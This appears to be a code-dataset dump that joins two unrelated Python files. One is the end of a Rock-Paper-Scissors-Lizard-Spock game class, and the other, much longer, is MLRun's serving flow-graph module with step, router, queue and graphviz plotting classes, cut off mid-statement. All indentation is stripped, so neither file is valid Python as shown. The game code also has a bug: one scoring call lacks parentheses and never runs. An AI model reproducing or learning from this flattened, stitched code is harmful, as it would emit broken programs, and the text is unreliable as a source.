def display_rules(self):
print('\nEach player choses one gesture from the list\n Rock crushes Scissors\n Scissors cuts Paper\n Paper covers Rock\n Rock crushes Lizard\n Lizard poisons Spock\n Spock smashes Scissors\n Scissors decapitates Lizard\n Lizard eats Paper\n Paper disproves Spock\n Spock vaporizes Rock')
def game_type(self):
validation = False
while validation is False:
user_choice = int(input('\nPlay a single player game or two player game? type "1" for single and "2" for multi: '))
if user_choice == 1 or user_choice == 2:
validation = True
else:
print('Please choose either "1" or "2"')
if user_choice == 1:
self.player_two = Ai()
else:
self.player_two = Human()
def game_rounds(self):
while self.player_one.score < 2 and self.player_two.score < 2:
p1_gesture = self.player_one.choose_gesture()
p2_gesture = self.player_two.choose_gesture()
print(f'{self.player_one.name} chose {p1_gesture}.')
print(f'{self.player_two.name} chose {p2_gesture}.')
self.choose_round_winner(p1_gesture, p2_gesture)
def choose_round_winner(self, p1_gesture, p2_gesture):
if p1_gesture == "Rock":
if(p2_gesture == "Rock"):
print("tie")
elif(p2_gesture == "Paper" or p2_gesture == "Spock"):
self.player_two.set_score()
print(self.player_two.name + " wins round")
elif(p2_gesture == "Scissors" or p2_gesture == "Lizard"):
self.player_one.set_score()
print(self.player_one.name + " wins round")
elif p1_gesture == "Paper":
if(p2_gesture == "Rock" or p2_gesture == "Spock"):
self.player_one.set_score()
print(self.player_one.name + " wins round")
elif(p2_gesture == "Paper"):
print("tie")
elif(p2_gesture == "Scissors" or p2_gesture == "Lizard"):
self.player_two.set_score()
print(self.player_two.name + " wins round")
elif p1_gesture == "Scissors":
if(p2_gesture == "Paper" or p2_gesture == "Lizard"):
self.player_one.set_score
print(self.player_one.name + " wins round")
elif(p2_gesture == "Rock" or p2_gesture == "Spock"):
self.player_two.set_score()
print(self.player_two.name +" wins")
elif(p2_gesture == "Scissors"):
print("tie")
elif p1_gesture == "Lizard":
if(p2_gesture == "Rock" or p2_gesture == "Scissors"):
self.player_two.set_score()
print(self.player_two.name +" wins round")
elif(p2_gesture == "Paper" or p2_gesture == "Spock"):
self.player_one.set_score()
print(self.player_one.name + " wins round")
elif(p2_gesture == "Lizard"):
print("tie")
elif p1_gesture == "Spock":
if(p2_gesture == "Rock" or p2_gesture == "Scissors"):
self.player_one.set_score()
print(self.player_one.name + " wins round")
elif(p2_gesture == "Paper" or p2_gesture == "Lizard"):
self.player_two.set_score()
print(self.player_two.name + " wins round")
elif(p2_gesture == "Spock"):
print("tie")
def get_game_winner(self):
if(self.player_one.score == 2):
print(self.player_one.name + " Wins!")
else:
print(self.player_two.name + " Wins!") |
22,018 | d77aad8ee4f02c4f57f9248ced41e6b44a2a7de2 | # Copyright 2018 Iguazio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = ["TaskStep", "RouterStep", "RootFlowStep"]
import os
import pathlib
import traceback
import warnings
from copy import copy, deepcopy
from inspect import getfullargspec, signature
from typing import Union
from ..config import config
from ..datastore import get_stream_pusher
from ..errors import MLRunInvalidArgumentError
from ..model import ModelObj, ObjectDict
from ..platforms.iguazio import parse_v3io_path
from ..utils import get_class, get_function
from .utils import _extract_input_data, _update_result_body
callable_prefix = "_"
path_splitter = "/"
previous_step = "$prev"
class GraphError(Exception):
"""error in graph topology or configuration"""
pass
class StepKinds:
router = "router"
task = "task"
flow = "flow"
queue = "queue"
choice = "choice"
root = "root"
_task_step_fields = [
"kind",
"class_name",
"class_args",
"handler",
"skip_context",
"after",
"function",
"comment",
"shape",
"full_event",
"on_error",
"responder",
"input_path",
"result_path",
]
def new_model_endpoint(class_name, model_path, handler=None, **class_args):
class_args = deepcopy(class_args)
class_args["model_path"] = model_path
return TaskStep(class_name, class_args, handler=handler)
def new_remote_endpoint(url, **class_args):
class_args = deepcopy(class_args)
class_args["url"] = url
return TaskStep("$remote", class_args)
class BaseStep(ModelObj):
kind = "BaseStep"
default_shape = "ellipse"
_dict_fields = ["kind", "comment", "after", "on_error"]
def __init__(self, name: str = None, after: list = None, shape: str = None):
self.name = name
self._parent = None
self.comment = None
self.context = None
self.after = after
self._next = None
self.shape = shape
self.on_error = None
self._on_error_handler = None
def get_shape(self):
"""graphviz shape"""
return self.shape or self.default_shape
def set_parent(self, parent):
"""set/link the step parent (flow/router)"""
self._parent = parent
@property
def next(self):
return self._next
@property
def parent(self):
"""step parent (flow/router)"""
return self._parent
def set_next(self, key: str):
"""set/insert the key as next after this step, optionally remove other keys"""
if not self.next:
self._next = [key]
elif key not in self.next:
self._next.append(key)
return self
def after_step(self, after):
"""specify the previous step name"""
# most steps only accept one source
self.after = [after] if after else []
return self
def after_state(self, after):
warnings.warn(
"This method is deprecated. Use after_step instead",
# TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
PendingDeprecationWarning,
)
return self.after_step(after)
def error_handler(self, step_name: str = None, state_name=None):
"""set error handler step (on failure/raise of this step)"""
if state_name:
warnings.warn(
"The state_name parameter is deprecated. Use step_name instead",
# TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
PendingDeprecationWarning,
)
step_name = step_name or state_name
if not step_name:
raise MLRunInvalidArgumentError("Must specify step_name")
self.on_error = step_name
return self
def init_object(self, context, namespace, mode="sync", reset=False, **extra_kwargs):
"""init the step class"""
self.context = context
def _is_local_function(self, context):
return True
def get_children(self):
"""get child steps (for router/flow)"""
return []
def __iter__(self):
yield from []
@property
def fullname(self):
"""full path/name (include parents)"""
name = self.name or ""
if self._parent and self._parent.fullname:
name = path_splitter.join([self._parent.fullname, name])
return name.replace(":", "_") # replace for graphviz escaping
def _post_init(self, mode="sync"):
pass
def _set_error_handler(self):
"""init/link the error handler for this step"""
if self.on_error:
error_step = self.context.root.path_to_step(self.on_error)
self._on_error_handler = error_step.run
def _log_error(self, event, err, **kwargs):
"""on failure log (for sync mode)"""
self.context.logger.error(
f"step {self.name} got error {err} when processing an event:\n {event.body}"
)
message = traceback.format_exc()
self.context.logger.error(message)
self.context.push_error(
event, f"{err}\n{message}", source=self.fullname, **kwargs
)
def _call_error_handler(self, event, err, **kwargs):
"""call the error handler if exist"""
if self._on_error_handler:
event.error = str(err)
event.origin_state = self.fullname
return self._on_error_handler(event)
def path_to_step(self, path: str):
"""return step object from step relative/fullname"""
path = path or ""
tree = path.split(path_splitter)
next_level = self
for step in tree:
if step not in next_level:
raise GraphError(
f"step {step} doesnt exist in the graph under {next_level.fullname}"
)
next_level = next_level[step]
return next_level
def path_to_state(self, path: str):
warnings.warn(
"This method is deprecated. Use path_to_step instead",
# TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
PendingDeprecationWarning,
)
return self.path_to_step(path)
def to(
self,
class_name: Union[str, type] = None,
name: str = None,
handler: str = None,
graph_shape: str = None,
function: str = None,
full_event: bool = None,
input_path: str = None,
result_path: str = None,
**class_args,
):
"""add a step right after this step and return the new step
example, a 4 step pipeline ending with a stream:
graph.to('URLDownloader')\
.to('ToParagraphs')\
.to(name='to_json', handler='json.dumps')\
.to('>>', 'to_v3io', path=stream_path)\
:param class_name: class name or step object to build the step from
for router steps the class name should start with '*'
for queue/stream step the class should be '>>' or '$queue'
:param name: unique name (and path) for the child step, default is class name
:param handler: class/function handler to invoke on run/event
:param graph_shape: graphviz shape name
:param function: function this step should run in
:param full_event: this step accepts the full event (not just body)
:param input_path: selects the key/path in the event to use as input to the step
this require that the event body will behave like a dict, example:
event: {"data": {"a": 5, "b": 7}}, input_path="data.b" means the step will
receive 7 as input
:param result_path: selects the key/path in the event to write the results to
this require that the event body will behave like a dict, example:
event: {"x": 5} , result_path="y" means the output of the step will be written
to event["y"] resulting in {"x": 5, "y": <result>}
:param class_args: class init arguments
"""
if hasattr(self, "steps"):
parent = self
elif self._parent:
parent = self._parent
else:
raise GraphError(
f"step {self.name} parent is not set or its not part of a graph"
)
name, step = params_to_step(
class_name,
name,
handler,
graph_shape=graph_shape,
function=function,
full_event=full_event,
input_path=input_path,
result_path=result_path,
class_args=class_args,
)
step = parent._steps.update(name, step)
step.set_parent(parent)
if not hasattr(self, "steps"):
# check that its not the root, todo: in future may gave nested flows
step.after_step(self.name)
parent._last_added = step
return step
class TaskStep(BaseStep):
"""task execution step, runs a class or handler"""
kind = "task"
_dict_fields = _task_step_fields
_default_class = ""
def __init__(
self,
class_name: Union[str, type] = None,
class_args: dict = None,
handler: str = None,
name: str = None,
after: list = None,
full_event: bool = None,
function: str = None,
responder: bool = None,
input_path: str = None,
result_path: str = None,
):
super().__init__(name, after)
self.class_name = class_name
self.class_args = class_args or {}
self.handler = handler
self.function = function
self._handler = None
self._object = None
self._async_object = None
self.skip_context = None
self.context = None
self._class_object = None
self.responder = responder
self.full_event = full_event
self.input_path = input_path
self.result_path = result_path
self.on_error = None
self._inject_context = False
self._call_with_event = False
def init_object(self, context, namespace, mode="sync", reset=False, **extra_kwargs):
self.context = context
self._async_object = None
if not self._is_local_function(context):
# skip init of non local functions
return
if self.handler and not self.class_name:
# link to function
if callable(self.handler):
self._handler = self.handler
self.handler = self.handler.__name__
else:
self._handler = get_function(self.handler, namespace)
args = signature(self._handler).parameters
if args and "context" in list(args.keys()):
self._inject_context = True
return
if isinstance(self.class_name, type):
self._class_object = self.class_name
self.class_name = self.class_name.__name__
if not self._class_object:
if self.class_name == "$remote":
from mlrun.serving.remote import RemoteStep
self._class_object = RemoteStep
else:
self._class_object = get_class(
self.class_name or self._default_class, namespace
)
if not self._object or reset:
# init the step class + args
class_args = {}
for key, arg in self.class_args.items():
if key.startswith(callable_prefix):
class_args[key[1:]] = get_function(arg, namespace)
else:
class_args[key] = arg
class_args.update(extra_kwargs)
# add common args (name, context, ..) only if target class can accept them
argspec = getfullargspec(self._class_object)
for key in ["name", "context", "input_path", "result_path", "full_event"]:
if argspec.varkw or key in argspec.args:
class_args[key] = getattr(self, key)
try:
self._object = self._class_object(**class_args)
except TypeError as exc:
raise TypeError(
f"failed to init step {self.name}, {exc}\n args={self.class_args}"
)
# determine the right class handler to use
handler = self.handler
if handler:
if not hasattr(self._object, handler):
raise GraphError(
f"handler ({handler}) specified but doesnt exist in class {self.class_name}"
)
else:
if hasattr(self._object, "do_event"):
handler = "do_event"
self._call_with_event = True
elif hasattr(self._object, "do"):
handler = "do"
if handler:
self._handler = getattr(self._object, handler, None)
self._set_error_handler()
if mode != "skip":
self._post_init(mode)
def _is_local_function(self, context):
# detect if the class is local (and should be initialized)
current_function = get_current_function(context)
if current_function == "*":
return True
if not self.function and not current_function:
return True
if (
self.function and self.function == "*"
) or self.function == current_function:
return True
return False
@property
def async_object(self):
"""return the sync or async (storey) class instance"""
return self._async_object or self._object
def clear_object(self):
self._object = None
def _post_init(self, mode="sync"):
if self._object and hasattr(self._object, "post_init"):
self._object.post_init(mode)
def respond(self):
"""mark this step as the responder.
step output will be returned as the flow result, no other step can follow
"""
self.responder = True
return self
def run(self, event, *args, **kwargs):
"""run this step, in async flows the run is done through storey"""
if not self._is_local_function(self.context):
# todo invoke remote via REST call
return event
if self.context.verbose:
self.context.logger.info(f"step {self.name} got event {event.body}")
# inject context parameter if it is expected by the handler
if self._inject_context:
kwargs["context"] = self.context
elif kwargs and "context" in kwargs:
del kwargs["context"]
try:
if self.full_event or self._call_with_event:
return self._handler(event, *args, **kwargs)
if self._handler is None:
raise MLRunInvalidArgumentError(
f"step {self.name} does not have a handler"
)
result = self._handler(
_extract_input_data(self.input_path, event.body), *args, **kwargs
)
event.body = _update_result_body(self.result_path, event.body, result)
except Exception as exc:
self._log_error(event, exc)
handled = self._call_error_handler(event, exc)
if not handled:
raise exc
event.terminated = True
return event
class RouterStep(TaskStep):
"""router step, implement routing logic for running child routes"""
kind = "router"
default_shape = "doubleoctagon"
_dict_fields = _task_step_fields + ["routes"]
_default_class = "mlrun.serving.ModelRouter"
def __init__(
self,
class_name: Union[str, type] = None,
class_args: dict = None,
handler: str = None,
routes: list = None,
name: str = None,
function: str = None,
input_path: str = None,
result_path: str = None,
):
super().__init__(
class_name,
class_args,
handler,
name=name,
function=function,
input_path=input_path,
result_path=result_path,
)
self._routes: ObjectDict = None
self.routes = routes
def get_children(self):
"""get child steps (routes)"""
return self._routes.values()
@property
def routes(self):
"""child routes/steps, traffic is routed to routes based on router logic"""
return self._routes
@routes.setter
def routes(self, routes: dict):
self._routes = ObjectDict.from_dict(classes_map, routes, "task")
def add_route(
self,
key,
route=None,
class_name=None,
handler=None,
function=None,
**class_args,
):
"""add child route step or class to the router
:param key: unique name (and route path) for the child step
:param route: child step object (Task, ..)
:param class_name: class name to build the route step from (when route is not provided)
:param class_args: class init arguments
:param handler: class handler to invoke on run/event
"""
if not route and not class_name:
raise MLRunInvalidArgumentError("route or class_name must be specified")
if not route:
route = TaskStep(class_name, class_args, handler=handler)
route.function = function or route.function
route = self._routes.update(key, route)
route.set_parent(self)
return route
def clear_children(self, routes: list):
"""clear child steps (routes)"""
if not routes:
routes = self._routes.keys()
for key in routes:
del self._routes[key]
def init_object(self, context, namespace, mode="sync", reset=False, **extra_kwargs):
if not self._is_local_function(context):
return
self.class_args = self.class_args or {}
super().init_object(
context, namespace, "skip", reset=reset, routes=self._routes, **extra_kwargs
)
for route in self._routes.values():
if self.function and not route.function:
# if the router runs on a child function and the
# model function is not specified use the router function
route.function = self.function
route.set_parent(self)
route.init_object(context, namespace, mode, reset=reset)
self._set_error_handler()
self._post_init(mode)
def __getitem__(self, name):
return self._routes[name]
def __setitem__(self, name, route):
self.add_route(name, route)
def __delitem__(self, key):
del self._routes[key]
def __iter__(self):
yield from self._routes.keys()
def plot(self, filename=None, format=None, source=None, **kw):
"""plot/save a graphviz plot"""
return _generate_graphviz(
self, _add_graphviz_router, filename, format, source=source, **kw
)
class QueueStep(BaseStep):
"""queue step, implement an async queue or represent a stream"""
kind = "queue"
default_shape = "cds"
_dict_fields = BaseStep._dict_fields + [
"path",
"shards",
"retention_in_hours",
"options",
]
def __init__(
self,
name: str = None,
path: str = None,
after: list = None,
shards: int = None,
retention_in_hours: int = None,
**options,
):
super().__init__(name, after)
self.path = path
self.shards = shards
self.retention_in_hours = retention_in_hours
self.options = options
self._stream = None
self._async_object = None
def init_object(self, context, namespace, mode="sync", reset=False, **extra_kwargs):
self.context = context
if self.path:
self._stream = get_stream_pusher(
self.path,
shards=self.shards,
retention_in_hours=self.retention_in_hours,
)
self._set_error_handler()
@property
def async_object(self):
return self._async_object
def after_step(self, after):
# queue steps accept multiple sources
if self.after:
if after:
self.after.append(after)
else:
self.after = [after] if after else []
return self
def after_state(self, after):
warnings.warn(
"This method is deprecated. Use after_step instead",
# TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
PendingDeprecationWarning,
)
return self.after_step(after)
def run(self, event, *args, **kwargs):
data = event.body
if not data:
return event
if self._stream:
self._stream.push({"id": event.id, "body": data, "path": event.path})
event.terminated = True
event.body = None
return event
class FlowStep(BaseStep):
"""flow step, represent a workflow or DAG"""
kind = "flow"
_dict_fields = BaseStep._dict_fields + [
"steps",
"engine",
"default_final_step",
]
# TODO - remove once "states" is fully deprecated
@classmethod
def from_dict(cls, struct=None, fields=None, deprecated_fields: dict = None):
deprecated_fields = deprecated_fields or {}
deprecated_fields.update(
{"states": "steps", "default_final_state": "default_final_step"}
)
return super().from_dict(
struct, fields=fields, deprecated_fields=deprecated_fields
)
def __init__(
self,
name=None,
steps=None,
after: list = None,
engine=None,
final_step=None,
# TODO - remove once usage of "state" is fully deprecated
states=None,
final_state=None,
):
super().__init__(name, after)
if states:
warnings.warn(
"The states parameter is deprecated. Use steps instead",
# TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
PendingDeprecationWarning,
)
steps = steps or states
if final_state:
warnings.warn(
"The final_state parameter is deprecated. Use final_step instead",
# TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
PendingDeprecationWarning,
)
final_step = final_step or final_state
self._steps = None
self.steps = steps
self.engine = engine
# TODO - remove use of START_FROM_STATE once it's fully deprecated.
self.from_step = os.environ.get("START_FROM_STEP", None) or os.environ.get(
"START_FROM_STATE", None
)
self.final_step = final_step
self._last_added = None
self._controller = None
self._wait_for_result = False
self._source = None
self._start_steps = []
def get_children(self):
return self._steps.values()
@property
def steps(self):
"""child (workflow) steps"""
return self._steps
@property
def states(self):
warnings.warn(
"This property is deprecated. Use steps instead",
# TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
PendingDeprecationWarning,
)
return self._steps
@property
def controller(self):
"""async (storey) flow controller"""
return self._controller
@steps.setter
def steps(self, steps):
self._steps = ObjectDict.from_dict(classes_map, steps, "task")
@states.setter
def states(self, states):
warnings.warn(
"This property is deprecated. Use steps instead",
# TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
PendingDeprecationWarning,
)
self._steps = ObjectDict.from_dict(classes_map, states, "task")
def add_step(
self,
class_name=None,
name=None,
handler=None,
after=None,
before=None,
graph_shape=None,
function=None,
full_event: bool = None,
input_path: str = None,
result_path: str = None,
**class_args,
):
"""add task, queue or router step/class to the flow
use after/before to insert into a specific location
example:
graph = fn.set_topology("flow", exist_ok=True)
graph.add_step(class_name="Chain", name="s1")
graph.add_step(class_name="Chain", name="s3", after="$prev")
graph.add_step(class_name="Chain", name="s2", after="s1", before="s3")
:param class_name: class name or step object to build the step from
for router steps the class name should start with '*'
for queue/stream step the class should be '>>' or '$queue'
:param name: unique name (and path) for the child step, default is class name
:param handler: class/function handler to invoke on run/event
:param after: the step name this step comes after
can use $prev to indicate the last added step
:param before: string or list of next step names that will run after this step
:param graph_shape: graphviz shape name
:param function: function this step should run in
:param full_event: this step accepts the full event (not just body)
:param input_path: selects the key/path in the event to use as input to the step
this require that the event body will behave like a dict, example:
event: {"data": {"a": 5, "b": 7}}, input_path="data.b" means the step will
receive 7 as input
:param result_path: selects the key/path in the event to write the results to
this require that the event body will behave like a dict, example:
event: {"x": 5} , result_path="y" means the output of the step will be written
to event["y"] resulting in {"x": 5, "y": <result>}
:param class_args: class init arguments
"""
name, step = params_to_step(
class_name,
name,
handler,
graph_shape=graph_shape,
function=function,
full_event=full_event,
input_path=input_path,
result_path=result_path,
class_args=class_args,
)
self.insert_step(name, step, after, before)
return step
def insert_state(self, key, state, after, before=None):
warnings.warn(
"This method is deprecated. Use insert_step instead",
# TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
PendingDeprecationWarning,
)
return self.insert_step(key, state, after, before)
def insert_step(self, key, step, after, before=None):
"""insert step object into the flow, specify before and after"""
step = self._steps.update(key, step)
step.set_parent(self)
if after == "$prev" and len(self._steps) == 1:
after = None
previous = ""
if after:
if after == "$prev" and self._last_added:
previous = self._last_added.name
else:
if after not in self._steps.keys():
raise MLRunInvalidArgumentError(
f"cant set after, there is no step named {after}"
)
previous = after
step.after_step(previous)
if before:
if before not in self._steps.keys():
raise MLRunInvalidArgumentError(
f"cant set before, there is no step named {before}"
)
if before == step.name or before == previous:
raise GraphError(
f"graph loop, step {before} is specified in before and/or after {key}"
)
self[before].after_step(step.name)
self._last_added = step
return step
def clear_children(self, steps: list = None, states: list = None):
"""remove some or all of the states, empty/None for all"""
if states:
warnings.warn(
"This states parameter is deprecated. Use steps instead",
# TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
PendingDeprecationWarning,
)
steps = steps or states
if not steps:
steps = self._steps.keys()
for key in steps:
del self._steps[key]
def __getitem__(self, name):
return self._steps[name]
def __setitem__(self, name, step):
self.add_step(name, step)
def __delitem__(self, key):
del self._steps[key]
def __iter__(self):
yield from self._steps.keys()
def init_object(self, context, namespace, mode="sync", reset=False, **extra_kwargs):
self.context = context
self.check_and_process_graph()
for step in self._steps.values():
step.set_parent(self)
step.init_object(context, namespace, mode, reset=reset)
self._set_error_handler()
self._post_init(mode)
if self.engine != "sync":
self._build_async_flow()
def check_and_process_graph(self, allow_empty=False):
"""validate correct graph layout and initialize the .next links"""
if self.is_empty() and allow_empty:
self._start_steps = []
return [], None, []
def has_loop(step, previous):
for next_step in step.after or []:
if next_step in previous:
return step.name
downstream = has_loop(self[next_step], previous + [next_step])
if downstream:
return downstream
return None
start_steps = []
for step in self._steps.values():
step._next = None
if step.after:
loop_step = has_loop(step, [])
if loop_step:
raise GraphError(
f"Error, loop detected in step {loop_step}, graph must be acyclic (DAG)"
)
else:
start_steps.append(step.name)
responders = []
for step in self._steps.values():
if hasattr(step, "responder") and step.responder:
responders.append(step.name)
if step.on_error and step.on_error in start_steps:
start_steps.remove(step.on_error)
if step.after:
prev_step = step.after[0]
self[prev_step].set_next(step.name)
if self.on_error and self.on_error in start_steps:
start_steps.remove(self.on_error)
if (
len(responders) > 1
): # should not have multiple steps which respond to request
raise GraphError(
f'there are more than one responder steps in the graph ({",".join(responders)})'
)
if self.from_step:
if self.from_step not in self.steps:
raise GraphError(
f"from_step ({self.from_step}) specified and not found in graph steps"
)
start_steps = [self.from_step]
self._start_steps = [self[name] for name in start_steps]
def get_first_function_step(step, current_function):
# find the first step which belongs to the function
if (
hasattr(step, "function")
and step.function
and step.function == current_function
):
return step
for item in step.next or []:
next_step = self[item]
returned_step = get_first_function_step(next_step, current_function)
if returned_step:
return returned_step
current_function = get_current_function(self.context)
if current_function and current_function != "*":
new_start_steps = []
for from_step in self._start_steps:
step = get_first_function_step(from_step, current_function)
if step:
new_start_steps.append(step)
if not new_start_steps:
raise GraphError(
f"did not find steps pointing to current function ({current_function})"
)
self._start_steps = new_start_steps
if self.engine == "sync" and len(self._start_steps) > 1:
raise GraphError(
"sync engine can only have one starting step (without .after)"
)
default_final_step = None
if self.final_step:
if self.final_step not in self.steps:
raise GraphError(
f"final_step ({self.final_step}) specified and not found in graph steps"
)
default_final_step = self.final_step
elif len(self._start_steps) == 1:
# find the final step in case if a simple sequence of steps
next_obj = self._start_steps[0]
while next_obj:
next = next_obj.next
if not next:
default_final_step = next_obj.name
break
next_obj = self[next[0]] if len(next) == 1 else None
return self._start_steps, default_final_step, responders
def set_flow_source(self, source):
"""set the async flow (storey) source"""
self._source = source
def _build_async_flow(self):
"""initialize and build the async/storey DAG"""
def process_step(state, step, root):
if not state._is_local_function(self.context):
return
for item in state.next or []:
next_state = root[item]
if next_state.async_object:
next_step = step.to(next_state.async_object)
process_step(next_state, next_step, root)
default_source, self._wait_for_result = _init_async_objects(
self.context, self._steps.values()
)
source = self._source or default_source
for next_state in self._start_steps:
next_step = source.to(next_state.async_object)
process_step(next_state, next_step, self)
for step in self._steps.values():
# add error handler hooks
if (step.on_error or self.on_error) and step.async_object:
error_step = self._steps[step.on_error or self.on_error]
# never set a step as its own error handler
if step != error_step:
step.async_object.set_recovery_step(error_step.async_object)
self._controller = source.run()
def get_queue_links(self):
"""return dict of function and queue its listening on, for building stream triggers"""
links = {}
for step in self.get_children():
if step.kind == StepKinds.queue:
for item in step.next or []:
next_step = self[item]
if not next_step.function:
raise GraphError(
f"child function name must be specified in steps ({next_step.name}) which follow a queue"
)
if next_step.function in links:
raise GraphError(
f"function ({next_step.function}) cannot read from multiple queues"
)
links[next_step.function] = step
return links
def init_queues(self):
"""init/create the streams used in this flow"""
for step in self.get_children():
if step.kind == StepKinds.queue:
step.init_object(self.context, None)
def is_empty(self):
"""is the graph empty (no child steps)"""
return len(self.steps) == 0
@staticmethod
async def _await_and_return_id(awaitable, event):
await awaitable
event = copy(event)
event.body = {"id": event.id}
return event
def run(self, event, *args, **kwargs):
if self._controller:
# async flow (using storey)
event._awaitable_result = None
if config.datastore.async_source_mode == "enabled":
resp_awaitable = self._controller.emit(
event, await_result=self._wait_for_result
)
if self._wait_for_result:
return resp_awaitable
return self._await_and_return_id(resp_awaitable, event)
else:
resp = self._controller.emit(
event, return_awaitable_result=self._wait_for_result
)
if self._wait_for_result and resp:
return resp.await_result()
event = copy(event)
event.body = {"id": event.id}
return event
if len(self._start_steps) == 0:
return event
next_obj = self._start_steps[0]
while next_obj:
try:
event = next_obj.run(event, *args, **kwargs)
except Exception as exc:
self._log_error(event, exc, failed_step=next_obj.name)
handled = self._call_error_handler(event, exc)
if not handled:
raise exc
event.terminated = True
return event
if hasattr(event, "terminated") and event.terminated:
return event
next = next_obj.next
if next and len(next) > 1:
raise GraphError(
f"synchronous flow engine doesnt support branches use async, step={next_obj.name}"
)
next_obj = self[next[0]] if next else None
return event
def wait_for_completion(self):
"""wait for completion of run in async flows"""
if self._controller:
if hasattr(self._controller, "terminate"):
self._controller.terminate()
return self._controller.await_termination()
def plot(self, filename=None, format=None, source=None, targets=None, **kw):
"""plot/save graph using graphviz"""
return _generate_graphviz(
self,
_add_graphviz_flow,
filename,
format,
source=source,
targets=targets,
**kw,
)
class RootFlowStep(FlowStep):
"""root flow step"""
kind = "root"
_dict_fields = ["steps", "engine", "final_step", "on_error"]
# TODO - remove once "final_state" is fully deprecated
@classmethod
def from_dict(cls, struct=None, fields=None):
return super().from_dict(
struct, fields=fields, deprecated_fields={"final_state": "final_step"}
)
classes_map = {
"task": TaskStep,
"router": RouterStep,
"flow": FlowStep,
"queue": QueueStep,
}
def get_current_function(context):
if context and hasattr(context, "current_function"):
return context.current_function or ""
return ""
def _add_graphviz_router(graph, step, source=None, **kwargs):
if source:
graph.node("_start", source.name, shape=source.shape, style="filled")
graph.edge("_start", step.fullname)
graph.node(step.fullname, label=step.name, shape=step.get_shape())
for route in step.get_children():
graph.node(route.fullname, label=route.name, shape=route.get_shape())
graph.edge(step.fullname, route.fullname)
def _add_graphviz_flow(
graph, step, source=None, targets=None,
):
start_steps, default_final_step, responders = step.check_and_process_graph(
allow_empty=True
)
graph.node("_start", source.name, shape=source.shape, style="filled")
for start_step in start_steps:
graph.edge("_start", start_step.fullname)
for child in step.get_children():
kind = child.kind
if kind == StepKinds.router:
with graph.subgraph(name="cluster_" + child.fullname) as sg:
_add_graphviz_router(sg, child)
else:
graph.node(child.fullname, label=child.name, shape=child.get_shape())
after = child.after or []
for item in after:
previous_object = step[item]
kw = (
{"ltail": "cluster_" + previous_object.fullname}
if previous_object.kind == StepKinds.router
else {}
)
graph.edge(previous_object.fullname, child.fullname, **kw)
if child.on_error:
graph.edge(child.fullname, child.on_error, style="dashed")
# draw targets after the last step (if specified)
if targets:
for target in targets or []:
graph.node(target.fullname, label=target.name, shape=target.get_shape())
last_step = target.after or default_final_step
if last_step:
graph.edge(last_step, target.fullname)
def _generate_graphviz(
step, renderer, filename=None, format=None, source=None, targets=None, **kw,
):
try:
from graphviz import Digraph
except ImportError:
raise ImportError(
'graphviz is not installed, run "pip install graphviz" first!'
)
graph = Digraph("mlrun-flow", format="jpg")
graph.attr(compound="true", **kw)
source = source or BaseStep("start", shape="egg")
renderer(graph, step, source=source, targets=targets)
if filename:
suffix = pathlib.Path(filename).suffix
if suffix:
filename = filename[: -len(suffix)]
format = format or suffix[1:]
format = format or "png"
graph.render(filename, format=format)
return graph
def graph_root_setter(server, graph):
"""set graph root object from class or dict"""
if graph:
if isinstance(graph, dict):
kind = graph.get("kind")
elif hasattr(graph, "kind"):
kind = graph.kind
else:
raise MLRunInvalidArgumentError("graph must be a dict or a valid object")
if kind == StepKinds.router:
server._graph = server._verify_dict(graph, "graph", RouterStep)
elif not kind or kind == StepKinds.root:
server._graph = server._verify_dict(graph, "graph", RootFlowStep)
else:
raise GraphError(f"illegal root step {kind}")
def get_name(name, class_name):
"""get task name from provided name or class"""
if name:
return name
if not class_name:
raise MLRunInvalidArgumentError("name or class_name must be provided")
if isinstance(class_name, type):
return class_name.__name__
return class_name
def params_to_state(
class_name,
name,
handler=None,
graph_shape=None,
function=None,
full_event=None,
class_args=None,
):
warnings.warn(
"This method is deprecated. Use param_to_step instead",
# TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
PendingDeprecationWarning,
)
return params_to_step(
class_name, name, handler, graph_shape, function, full_event, class_args
)
def params_to_step(
class_name,
name,
handler=None,
graph_shape=None,
function=None,
full_event=None,
input_path: str = None,
result_path: str = None,
class_args=None,
):
"""return step object from provided params or classes/objects"""
if class_name and hasattr(class_name, "to_dict"):
struct = class_name.to_dict()
kind = struct.get("kind", StepKinds.task)
name = name or struct.get("name", struct.get("class_name"))
cls = classes_map.get(kind, RootFlowStep)
step = cls.from_dict(struct)
step.function = function
step.full_event = full_event or step.full_event
step.input_path = input_path or step.input_path
step.result_path = result_path or step.result_path
elif class_name and class_name in [">>", "$queue"]:
if "path" not in class_args:
raise MLRunInvalidArgumentError(
"path=<stream path or None> must be specified for queues"
)
if not name:
raise MLRunInvalidArgumentError("queue name must be specified")
step = QueueStep(name, **class_args)
elif class_name and class_name.startswith("*"):
routes = class_args.get("routes", None)
class_name = class_name[1:]
name = get_name(name, class_name or "router")
step = RouterStep(
class_name,
class_args,
handler,
name=name,
function=function,
routes=routes,
input_path=input_path,
result_path=result_path,
)
elif class_name or handler:
name = get_name(name, class_name)
step = TaskStep(
class_name,
class_args,
handler,
name=name,
function=function,
full_event=full_event,
input_path=input_path,
result_path=result_path,
)
else:
raise MLRunInvalidArgumentError("class_name or handler must be provided")
if graph_shape:
step.shape = graph_shape
return name, step
def _init_async_objects(context, steps):
try:
import storey
except ImportError:
raise GraphError("storey package is not installed, use pip install storey")
wait_for_result = False
for step in steps:
if hasattr(step, "async_object") and step._is_local_function(context):
if step.kind == StepKinds.queue:
skip_stream = context.is_mock and step.next
if step.path and not skip_stream:
stream_path = step.path
endpoint = None
if "://" in stream_path:
endpoint, stream_path = parse_v3io_path(step.path)
stream_path = stream_path.strip("/")
step._async_object = storey.StreamTarget(
